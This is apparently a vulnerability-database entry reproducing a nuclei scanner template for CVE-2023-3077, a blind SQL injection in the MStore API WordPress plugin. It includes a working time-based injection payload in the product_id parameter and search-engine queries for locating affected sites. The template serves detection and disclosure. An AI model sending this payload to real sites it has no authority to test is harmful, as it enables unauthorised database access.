MStore API < 3.9.8 - SQL Injection

02 Jul 2026 09:36:57 · Reported by ProjectDiscovery · Type: nuclei · Source: github.com

MStore API < 3.9.8 - SQL Injection, allows extraction of sensitive data, update to latest versio

Related

| Reporter | Title | Published |
|---|---|---|
| CNNVD | WordPress plugin MStore API SQL injection vulnerability | 10 Jul 2023 00:00 |
| CVE | CVE-2023-3077 | 10 Jul 2023 12:40 |
| Cvelist | CVE-2023-3077 MStore API < 3.9.8 - Unauthenticated Blind SQLi | 10 Jul 2023 12:40 |
| NVD | CVE-2023-3077 | 10 Jul 2023 16:15 |
| OSV | CVE-2023-3077 | 10 Jul 2023 16:15 |
| Prion | Sql injection | 10 Jul 2023 16:15 |
| Positive Technologies | PT-2023-22967 · WordPress · Mstore Api +1 | 10 Jul 2023 00:00 |
| RedhatCVE | CVE-2023-3077 | 23 May 2025 02:12 |
| Vulnrichment | CVE-2023-3077 MStore API < 3.9.8 - Unauthenticated Blind SQLi | 10 Jul 2023 12:40 |
| Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (June 19, 2023 to June 25, 2023) | 29 Jun 2023 13:24 |

id: CVE-2023-3077

info:
  name: MStore API < 3.9.8 - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.
  impact: |
    Allows an attacker to extract sensitive data from the database
  remediation: |
    Update MStore API WordPress Plugin to the latest version to mitigate the vulnerability
  reference:
    - https://wpscan.com/vulnerability/9480d0b5-97da-467d-98f6-71a32599a432
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3077
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3077
    epss-score: 0.05304
    epss-percentile: 0.91579
    cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: inspireui
    product: mstore_api
    framework: wordpress
    publicwww-query: "/wp-content/plugins/mstore-api/"
    shodan-query: http.html:/wp-content/plugins/mstore-api/
    fofa-query: body=/wp-content/plugins/mstore-api/
  tags: time-based-sqli,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 200'
          - 'contains(body, "MStore API")'
        condition: and

  - raw:
      - |
        @timeout: 15s
        GET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ae6c602043b3c38f5d0b088b634e415a6b704fd7724aa7cfa3bb71b020c83944022100876c07ff9d48213651a2f34a3765f973d2ceead7627e7619108bcd862134b133:922c64590222798bb761d5b6d8e72950


04 Feb 2026 07:00 (Current)
Vulners AI Score: 7.3 (High risk)
CVSS 3.1: 9.8
EPSS: 0.05304